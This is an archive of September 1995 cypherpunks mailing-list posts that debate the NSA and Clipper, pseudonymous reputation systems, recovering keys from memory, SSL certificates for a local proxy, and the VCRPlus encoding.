Date: Mon, 4 Sep 95 15:48:00 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: e$: More fun with cash: Senate Bill 307
In-Reply-To: <199509042224.SAA05533@tequesta.gate.net>
Message-ID: <Pine.SUN.3.91.950904184709.20203B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Jim Ray wrote:

> Date: Mon, 04 Sep 1995 18:22:43 -0400
> From: Jim Ray <liberty@gate.net>
> To: cypherpunks@toad.com
> Subject: Re: e$: More fun with cash: Senate Bill 307
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn wrote:
> 
> <snips>
> >
> >Actually it was aimed at the rumors that Iran had been printing U.S. 
> >currency on a large scale and using it abroad.  When I say Iran, I mean 
> >a government backed program.  New York Times had an article on the matter 
> >last year.  With enough interest I will try to Lexis/Nexus it.
> 
> I had heard that it was the Columbians, branching out from the cocaine
> business with those fancy new copy machines, which are supposed to be
> able to duplicate the blue & red threads in US currency paper.
> JMR

I've not heard anything about this.  Any sources?

> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Freedom isn't Freeh
> 
> iQCVAwUBMEt7vW1lp8bpvW01AQGnwwQAmPz1SagLoKpAmfUvwyI8GVq8wSOaFH96
> vTarz6PxnuNPHhITIAzPeq8EX5N8MexRfHtMbmK0JOxA5L+B+QHP1rTM8mqUbAJh
> Gg4ZMC9Jzvhq+JENaP8ZG03+pvm1nnZIr8WarY5DJ8FYNMLvDrSUhhWFu7OSo2a+
> fS0NKxpm5Ps=
> =HXa+
> -----END PGP SIGNATURE-----
> Regards, Jim Ray
> 
> See, when the GOVERNMENT spends money, it creates jobs; whereas 
> when the money is left in the hands of TAXPAYERS, God only knows 
> what they do with it.  Bake it into pies, probably.  Anything to 
> avoid creating jobs.  -- Dave Barry
> ------------------------------------------------------------------------
> PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
> Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
> ------------------------------------------------------------------------
> Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
> ________________________________________________________________________
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Mon, 4 Sep 95 15:50:01 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: pseudonyms & list health
In-Reply-To: <ac7072bf0602100490af@[205.199.118.202]>
Message-ID: <199509042248.SAA08649@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:

> At 6:13 AM 9/4/95, Futplex wrote:
> >Deranged Mutant writes:
> >> My worry is about abuse.  One would prefer to save endorsements and find
> >> a way to remove thumbs-downs... also how to prevent one from overdoing a
> >> thumbs-up or -down certification for a person (either to inflate or de-
> >> flate a reputation).
> >
> >A few nuisance lawsuits from people who were given thumbs-downs might do the
> >trick, as with employment recommendations in the U.S. :[
> 
> A good point that deserves further comment. Employers have taken to _saying
> nothing_ about past employees, for fear of lawsuits by disgruntled job
> seekers. So much for free speech, courtesy of the American legal system.

As a somehow related note, my experience with some past jobs is that in
some circumstances the employee turnover rate is high enough that a manager
will give a neutral or good rating simply because they have no experience
with a previous employee who clearly did not deserve a good rating.

Something similar could happen with mailing lists... hardly anyone can
remember when a 'newbie' posted to a list a few years ago, irregardless
of whether a person is still worth a certain rating after a time.

Then again, with a lot of material being archived, it might be easier in
some circumstances to review a person's contributions to a list rather
than rely on a rating... or maybe send a trusted rater to research an
author on the 'net for you rather than maintain a huge database of
ratings that will need some form of interpretation.

Then again, (as Tim and others noted) there's alws killfiles and manual
glossing over of threads, etc.

> But as we can't changed the litigious nature of American society (and maybe
> European society--I don't know), the emphasis ought to be on digital
> systems and reputations by pseudonyms.

Litigating in a society of pseudonyms may have it's own problems anyway...
(imagining suing a trusted friend of yours who prefers to give you much
needed crticisms through a pseudonym so as to protect the friendship...
on example off the top of my head)... How can a 'nym be held legally
accountable as a non-'nym?

-Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 4 Sep 95 18:56:52 PDT
To: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509041641.KAA26589@bvsd.k12.co.us>
Message-ID: <199509050153.SAA23364@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> understand marketing or human psychology. Clipper, the closest the
>> agency has come to creeping out of the darkness of their coffin,
>> was a total fiasco. the self-destructing director of NSA whats-his-name
>> who as running for that FBI position or whatever is another example of how 
>> the inbred spook society has difficulty dealing with anything outside
>> their artificial reality.
>
>I think you are dead wrong.  The NSA has mastered the market psychology.
>Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
>the NSA has had a hand in them all.  DES is by far the most popular cipher,
>popular enough that it will takes years and years to switch to something new.

no, I think the NSA is very adept at infiltrating and twisting existing
cryptographic market processes to suit their own ends. DES is a good example
of this. it was created by IBM largely, and then "manipulated" by the
NSA. this is well known and understood. the NSA does not work with standards
or markets so much as *interfere* with them. how can you deny this basic
premise embraced by virtually everyone on this list?

>As for the clipper "fiasco,"  I would argue that it was an excellent marketing
>move.  The NSA is aware that there is only a very very small percentage of 
>society the thinks about crypto, with the internet and what have you it is now
>possible for this minority to be heard, the NSA proposes clipper, and so we all
>bitch about it because it's only secure against non-government attacks.  Now
>the public hears this and resists clipper.  There isn't another product that is
>winning support that clipper could have had.  You step back and look at it, and
>the public is exactly where they were 5 years ago, no crypto.  

clearly, the first attempt was to get the public to embrace clipper. lacking
that, they have thwarted natural market progression. I agree they have
done this. but it's like making a pool shot accidentally and saying,
"I meant to do that". the NSA is *not* an agency that has a single clue
about *real* markets. they do have a brilliant ability to leverage their
political coercion skills to the absolute maximum to *manipulate* and
*interfere* and *piss on* newly growing markets. 

the NSA has screwed
up public crypto in uncountable ways. you cannot deny this!! they secretly
visit people doing state-of-the-art research and intimidate them into
silence or going other directions. they visited Mosaic designers to tell
them that the things they were installing in the software were not 
acceptable legally. of course, any other legal arm of the government
would simply sue once the software appeared, but not try to manipulate
the design prior to its release. this is the tactics of an *espionage*
and *intelligence* agency. surprise!!

to say that the NSA understands markets is like saying that thieves
understand how to pick pockets. yeah, that's true, but that's not
quite how I would have put it.

>Clipper was a no lose situation for them, if it is adopted only they can read
>all transactions made with it, if it isn't adopted, everybody can read all 
>transactions, they didn't lose anything. 

huge amounts of cash and credibility have been WASTED on it. the NSA has
lost enormous credibility because of this fiasco. furthermore, the way
they tried to hide behind presidential directives is absolutely repugnant
to anyone who has a belief in the separation of powers within our 
government.

>They have some top minds working for them, 

I know, it's a pity they don't get more respectable and socially
fulfilling jobs at companies, where they can be publicly rewarded
and recognized for their brilliance.

>it's been proven that they have been

k
>a few steps ahead of the public for a long time; it's foolish to think they 
>don't understand the psychology of the market. 

they *do* understand the market, only to the extent that they are trying
to successfully SABOTAGE what would regularly be it's natural growth.
they have been ahead in *theoretical* knowledge, but it was precisely
my *point* that this nebulous eggheadism has demonstrably exploded
when placed in public scrutiny.

do you realize the sheer ability of Microsoft to build software that
succeeds in *markets*? Microsoft doesn't care much about Netscape
because, as one microsoft engineer remarked, "well, it's strange
to talk about market share when you are giving away software for free".
well, the NSA is the absolute *opposite* of Microsoft. they don't
have a *clue* about true market forces. they do however understand
ways in which the government interferes with markets, and they seize
on every one of those mechanisms as their lifeblood for control
and "shadow/invisible oppression".

>Just as the public starts to 
>desire something like public key crypto, they can publish a standard on it
>and it is likely to be adopted.

the NSA is quickly losing relevance. the public *does* desire public
key crypto, and a defacto standard *has* been created, it's called PGP.
if the NSA proposes something in public key areas, it is likely to 
be pissed on by the public as much as Clipper, in many ways because
of the failure of Clipper. clipper in a big sense *was* the NSA's first
step toward public key encryption, and it was widely trounced on.

face it dude, the NSA has shown far less competence in the public arena
than *any* apologist such as yourself can ever demonstrate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 4 Sep 95 16:11:55 PDT
To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <199509042217.PAA17498@Csli.Stanford.EDU>
Message-ID: <9509042310.AA27080@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Also note the recent posting on sci.crypt by Peter Gutmann about being
>able to recover data from DRAMs and SRAMs after powerdown. It hits
>cryptokeys really bad. 

If the power is cycled as opposed to turned off only then a memory self test 
program will probably erase the data.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 4 Sep 95 16:25:30 PDT
To: cypherpunks@toad.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042324.TAA65697@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:
>> 
>> <more snips>
>> >
[I said]
>> 
>> I had heard that it was the Columbians, branching out from the cocaine
>> business with those fancy new copy machines, which are supposed to be
>> able to duplicate the blue & red threads in US currency paper.
>> JMR
>
>I've not heard anything about this.  Any sources?

Sorry, just my vague memory of a Miami Herald article from a while back.
Perhaps someone else on the list is more familiar with good copy-machines.
Around here, the Columbian cartels are depicted as very, powerful,
with easy payoffs to the highest levels of their country's political
and judicial systems, and access to technology such as Motorola's
encrypted walkie-talkie (supposedly a restricted-sale item). Of course,
US politicians are completely immune to bribes from drug cartels. <g>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMEuHYG1lp8bpvW01AQFTFwP+NhvKkGzuoXVOkd8oKWxFwQm4LvG+DL08
L6i/oXJVq2+AMApc12TS4VT7AS5UKfPp7Gu2pLKt6/G4m6KqLeN8vi31+ssOEBZs
PJhCV/GdXBwXCvHM+oklQI4Tref5zzs0Wu+ai2pE3tCt+sVL4t9SeFexhexbjwn3
H6cnT/g79Qs=
=NP8N
-----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 4 Sep 95 10:25:21 PDT
To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe AlgorithimRe: Emergency File Wipe Algorithim
Message-ID: <199509041725.TAA12314@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


When a running computer is seized in some sort of law enforcement
raid, what are the chances someone would think to backup the
contents of a RAMDISK drive prior to powering it down?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bplib@nic.wat.hookup.net
Date: Mon, 4 Sep 95 16:27:48 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
Message-ID: <199509042328.TAA02676@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


I too would be interested in the VCRPlus code. Has anyone broken it?
Tim Philp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Mon, 4 Sep 95 20:19:31 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive 1.4 Announcement Correction
Message-ID: <w9oXaD13w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It has been brought to my attention that the phone number supplied to
me by Michael Paul Johnson for his Catacombs BBS which appeared here
in a previous announcement was incorrect.

The correct number is 303-772-1062.  Other information in the
announcement is correct.

Edgar Swank
SecureDrive Co-Author

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEtHj94nNf3ah8DHAQGarAP+JVbBj/lwfz6x8+5VXql7y0EopkN0GmxM
pq+X5/20hxAotWWK2D99xIile1pxAyVvXVLZnwH8N4xdFFQPwydxxAzgLuURQoum
zxZBugrygM/6SAe1hF5hw1Z6YYJeR39g8O25CDY/1eSOIi9MQ1oJ4bdmANjLR2p7
cm7wMIagcyI=
=ZRG3
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 4 Sep 95 16:48:00 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID: <9509042347.AA27160@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I too would be interested in the VCRPlus code. Has anyone broken it?

Challenge time !

C'mon - can do this by exhaustive search probably :-)

There is a lot of stuff in the satelite tv newsgroups on this topic.
I think its an item well worth cracking.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 4 Sep 95 17:08:23 PDT
To: bplib@nic.wat.hookup.net
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID: <m0splXE-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


It was broken, and I might have the reference in my archives...

If I get time I'll find it.


> I too would be interested in the VCRPlus code. Has anyone broken it?
> Tim Philp
> 
> 


-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 4 Sep 95 20:44:01 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <8B074DD.00030003EA.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


CW> and relaxation are in the same order of magnitude.  Thus, a few microseconds of
CW> storing the opposite data to the currently stored value will have little effect
CW> on the oxide.  Ideally, the oxide should be exposed to as much stress at the

  Here is a simple way to handle the problem, using our old discredited
friend, XOR. Set up your software to periodically XOR the key with FFFF.
This way, each bit will be a 0 half the time, and a 1 the other half.
You have a flag that tells whether the key is in normal or inverted
form, so that you can quickly perform any necessary computations on it,
but there should not be any long-term memory effect.


 * Free will made me do it!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 4 Sep 95 20:48:12 PDT
To: David Murray <tcmay@got.net (Timothy C. May)
Subject: Re: A problem with anonymity
Message-ID: <199509050347.UAA09032@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:40 PM 9/2/95 +1300, David Murray wrote:
> I still think that, because of
> the (perfect) ease with which net.rep's are transferrable/cash-in-able,
> the chances you take in the digital domain are so much higher as to be
> (almost?) qualatatively different.

Then good names will have sufficient cash value, that their owners will
be deeply reluctant to damage those good names.

Obviously if one can obtain a good name cheaply, then in might be profitable
to misuse it.  In which case we swiftly run short of good names, and they
become expensive.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Mon, 4 Sep 95 20:51:06 PDT
To: cypherpunks@toad.com
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com>
Message-ID: <199509050348.UAA19868@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> >> understand marketing or human psychology. Clipper, the closest the
> >> agency has come to creeping out of the darkness of their coffin,
> >> was a total fiasco. the self-destructing director of NSA whats-his-name
> >> who as running for that FBI position or whatever is another example of how 
> >> the inbred spook society has difficulty dealing with anything outside
> >> their artificial reality.
> >
> >I think you are dead wrong.  The NSA has mastered the market psychology.
> >Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
> >the NSA has had a hand in them all.  DES is by far the most popular cipher,
> >popular enough that it will takes years and years to switch to something new.
> 
> no, I think the NSA is very adept at infiltrating and twisting existing
> cryptographic market processes to suit their own ends. DES is a good example
> of this. it was created by IBM largely, and then "manipulated" by the
> NSA. this is well known and understood. the NSA does not work with standards
> or markets so much as *interfere* with them. how can you deny this basic
> premise embraced by virtually everyone on this list?
> 
The NSA doesn't really bother me all that much, because all they've managed
up to now is to slow things down (by about 3 hrs. in the case of PGPhone).
But what happens when someone who HAS mastered market psychology gets into
the game?

Here's a prediction:  within one year, we will see the advent of Micro$oft's
"Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
Micro$oft itself, or a flat-out trap door.  ANY communications with a 
Windoze box or network will have to use it, or loose the market.  About the
same time, Justice will suddenly 'loose interest' in its various 
investigations of M$.  Micro$oft will probably give it away for free as part
of the Windows 95.702 upgrade. 

At this point, the NSA's 'speed bump' becomes Micro$oft's 'brick wall'.  And
while some of us will continue to use PGP and other strong crypto, the average
American will have kissed off ALL of her privacy to the tune of "... you make
a grown man cry."

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 4 Sep 95 21:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
Message-ID: <199509050417.VAA05211@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Adam Shostack <adam@bwh.harvard.edu>
> 	To get a certificate, you need to talk to Verisign, and give
> them a business plan, a key, and 270 bucks per year to get your key
> certified.
> 
> 	Verisign is a spin off of RSA.

Yes, this is my understanding.  I have also heard that the process is
not easy or routine, that the business plan receives considerable
scrutiny.  What I would be doing with the certificate is
unconventional.  I would publicize the secret key, and ship out free
software which would use the certificate to establish SSL
communications with the Netscape browser within the same PC that runs
the browser.  The real purpose of the certificate is not to
authenticate the key of a server running remotely, but simply to bypass
the security checks within Netscape Navigator.  So I am not confident
that this business plan will pass Verisign's muster.  Among other things,
it would be difficult to enforce the one year restriction (unless
Navigator checks a date in the certificate).

I understand that Netscape's browser will also accept certificates
created by a Netscape-internal "test" CA.  I hoped that perhaps some junk
certificates from that CA might be floating around, ones which would be
useless for conventional purposes because their secret keys are exposed,
but which would be perfect for my needs.

There is one "fallback" strategy possible which would allow the 128-bit
SSL security proxy to work.  That is to filter *all* connections, not
just secure ones, and convert https: URL's to http:.  Then Navigator will
not attempt to make any SSL connections at all, and the proxy can talk to
it non-securely, using 128-bit SSL for the external connection to the
server.  However this would be much harder, and the proxy would have to
somehow remember which URL's had been massaged like this so it would know
which ones are eligible to have secure connections made.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Mon, 4 Sep 95 21:16:04 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com>
Message-ID: <199509050415.WAA05593@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> no, I think the NSA is very adept at infiltrating and twisting existing
> cryptographic market processes to suit their own ends. DES is a good example
> of this. it was created by IBM largely, and then "manipulated" by the
> NSA. this is well known and understood. the NSA does not work with standards

Well known that the NSA manipulated DES?  How so?  I am willing to believe that
they had a lot of say in it and they probably wanted it weakened, but I think
you'll be very hard pressed to find proof of that.  Based on some of the 
analysis of lucifer, it could be said that IBM weakened the key space to 
because that was a side effect of adding strength to the overall cipher.  
Keyspace is just about the only weakness of DES, I don't think that can be said
about lucifer.

> or markets so much as *interfere* with them. how can you deny this basic
> premise embraced by virtually everyone on this list?

Interference is just noise, the NSA has pretty much pushed the market where they
want it to go.  If you think that is just "interference" then we use the word
differently.  

> clearly, the first attempt was to get the public to embrace clipper. lacking
> that, they have thwarted natural market progression. I agree they have
> done this. but it's like making a pool shot accidentally and saying,
> "I meant to do that". the NSA is *not* an agency that has a single clue
> about *real* markets. they do have a brilliant ability to leverage their
> political coercion skills to the absolute maximum to *manipulate* and
> *interfere* and *piss on* newly growing markets. 

If they are as powerful as we both seem to think (easily "interfering" with 
markets and screwing the public for decades) how can you underestimate them like
that?  If they are actually spying on us, then they know what moves we'll make
and they can always head that off, it's not slop pool.  If they aren't then I
don't know what I'm supposed to hold against them, I don't have to use their
standards unless I wish to export stuff.

> 
> the NSA has screwed
> up public crypto in uncountable ways. you cannot deny this!! they secretly

This is true, they make long term industry standards that are short lived.
DES's keyspace was far too small.  Escrow isn't a great idea (excpet for 
signatures) ITAR is bullshit.

> visit people doing state-of-the-art research and intimidate them into
> silence or going other directions. they visited Mosaic designers to tell
> them that the things they were installing in the software were not 
> acceptable legally. of course, any other legal arm of the government
> would simply sue once the software appeared, but not try to manipulate
> the design prior to its release. this is the tactics of an *espionage*
> and *intelligence* agency. surprise!!

This is all hearsay.  I doubt that the mosaic designers have had any contact 
with the NSA unless they invented a significant new cryptographic technology,
all Netscape/Mosaic have done is implement existing technology.  They even
implemented SSL with the 40bit exportable key size using rc4, which is what 
the law says you are supposed to do.  Any netscape employees want to dispute 
this and tell me about your encounters with the NSA?

> huge amounts of cash and credibility have been WASTED on it. the NSA has
> lost enormous credibility because of this fiasco. furthermore, the way
> they tried to hide behind presidential directives is absolutely repugnant
> to anyone who has a belief in the separation of powers within our 
> government.

They have only lost credibility to the cryptographic community, where they
already had very little credibilty.  This is the point that we all tend to 
overlook.  Joe SixPack, doesn't know much about the NSA or cryptography, when
first told about them he tends to think that they are their to protect him and
doesn't think of them as an enemy.  The biggest accomplishment of the clipper
thing is that nobody (very few at least) are using secure public key crypto
and the few new people to the issue have no idea who to trust now.  If their
job is to listen to tranmitions, then their money was well spent because there
aren't many secure transmitions right now.  and since everybody is scared about
it there aren't likely going to be a lot of secure transmitions real soon.


> do you realize the sheer ability of Microsoft to build software that
> succeeds in *markets*? Microsoft doesn't care much about Netscape
> because, as one microsoft engineer remarked, "well, it's strange
> to talk about market share when you are giving away software for free".
> well, the NSA is the absolute *opposite* of Microsoft. they don't
> have a *clue* about true market forces. they do however understand
> ways in which the government interferes with markets, and they seize
> on every one of those mechanisms as their lifeblood for control
> and "shadow/invisible oppression".

I disagree, the NSA and MS have a lot in common, they both have defined shoddy
standards that we are all using for one part of our life or other.  We will
have to put up with both of them for a long time and both of them are 
anticompetitive.  If market forces were so much more powerful than the NSA can
understand, then why the hell are all the banks in the world depending on DES?

> the NSA is quickly losing relevance. the public *does* desire public
> key crypto, and a defacto standard *has* been created, it's called PGP.
> if the NSA proposes something in public key areas, it is likely to 
> be pissed on by the public as much as Clipper, in many ways because
> of the failure of Clipper. clipper in a big sense *was* the NSA's first
> step toward public key encryption, and it was widely trounced on.

The NSA is only losing relevance with us, how many average folks even know what
clipper was?  We could even disregard the average people and just ask the 
computer users, how many of those 80million windows users know about clipper?
If it is enough for the NSA to "lose relevance" I would think this list with
be many times larger than it is. 

> 
> face it dude, the NSA has shown far less competence in the public arena
> than *any* apologist such as yourself can ever demonstrate.
> 

I take offence at that, I am not an apologist, I'm just trying to show the other
side.  We can't fight the NSA if we are all blind to what they do in the general
public's eyes.  For what it's worth, I can't think of a major commercial product
that uses cryptography that hasn't had the NSA's hands in it; that is pretty 
damn competent if you ask me.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 4 Sep 95 19:46:28 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com>
Message-ID: <199509050246.WAA14488@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	To get a certificate, you need to talk to Verisign, and give
them a business plan, a key, and 270 bucks per year to get your key
certified.

	Verisign is a spin off of RSA.

| The stumbling block is that Netscape won't connect to even the local
| proxy unless it sees a valid certificate, one signed by a CA that it
| accepts.  For this application I would need such a certificate, and make
| the corresponding public and private keys public, hard-coding them into
| the proxy.  Since the proxy runs on the same PC as the browser there is
| no need for confidentiality between them, and the secret key can be
| revealed.
| 
| Does anyone have an idea for a way to acquire a certificate acceptable to
| Netscape, perhaps one with a "broken key", that could be used for this
| purpose?
| 
| Hal
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Sep 95 23:48:23 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: DUMPSTER BONANZA
Message-ID: <Pine.SUN.3.91.950904224931.8980A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

This is not a crypto post, but those interested in threat models 
and counter-measures might want to read on.

I just looked at the October issue of Soldier of Fortune.  In an
article entitled "SOF Exposes ATF's Warbirds" the author tells
about the 7 to 12 attack aircraft that the BATF has purchased.

Of course, it's interesting to hear how and why this agency
decided it needed an airforce to pursue its mission, but the real
story for me was how SOF busted them.

SOF had heard rumors about a covert operation on the part of the
BATF to procure these aircraft.  They did their own surveillence
of the BATF's phony cover corporation.  This included dumpster
diving.  What they came up with was unbelievable.  It included
agents home addresses, the names of family members, official BATF
stationery, the works.

If you want to read a fascinating tale of BATF incompetence and
duplicity, check this one out.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 4 Sep 95 22:12:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: article/author ratings/reputations (was Re: pseudonyms & list health)
In-Reply-To: <9509040614.AA01461@cs.umass.edu>
Message-ID: <199509050512.XAA08518@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Futplex sez:
> 
> A reviewer named Susan Granger, for example, is known to me as a person who 
> routinely lauds lousy movies. Thus it's simple for me to ignore her positive
> recommendations (I've yet to see a negative review from her). In fact, when
> I observe that a new film prominently features her seal of approval in its 
> advertising, I take that fact as an indication of the lack of praise from
> more discriminating reviewers. So a nominal "positive" credential may be
> interpreted as an implicit negative credential, depending upon context.
> 
> OTOH, if I only give digital thumbs-up to a couple of people on the list,
> those who consider me a reputable appraiser-of-cpunks should find the
> information relatively useful. I'm sure I can manage to be a harsher critic
> than your 2nd-grade teacher :}  Using e.g. a single 1-10 scale would be
> highly practical for such purposes, IMHO.


There are people working on an extension of UseNet to allow each reader to
publish ratings which propagate in the same way that articles do.  These
ratings can be of specific articles, of threads or of authors.  Your
newsreaders can rank the articles and present them to you in
highest-to-lowest ranked order, or kill all those below a certain mark, or
some such.

The heuristic that the researchers originally started with was "if I agreed 
with so-and-so in the past then I'll probably agree with him again."  
(Personally I would rather have some degree of manual control over my 
ratings-weightings.  My good friends automatically get more weight than 
people I don't know, regardless of how much our ratings coincide.  
Similarly I might want to downgrade certain net.assholes just out of a 
sense of justice, even if they recommend good articles usually.  :-) )


Unfortunately I have lost the URL for this wonderful experiment.  Hopefully
the fruits of their labors will become publically available soon.  I will
certainly be one of the first to sign up to distribute ratings and to listen
to (some) other people's.


Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBMEvcJfWZSllhfG25AQE+0QQAj2rx2gT9gaYlMyhiJd3TkfrjAS9dVcYk
iFUHu1wsrcIoXvHExRmvborJArcix7uz/qptO9lg8DHRAxHYGtJyEzDaCnq60juz
xFHt/7NdV+gLIv5JVHFDCxTzzfmwNSvr5Q2Rb5vv8jUmih4AhSzkApBHF/lzFhNH
2U3SYK7Vmhc=
=Zodf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 4 Sep 95 22:15:38 PDT
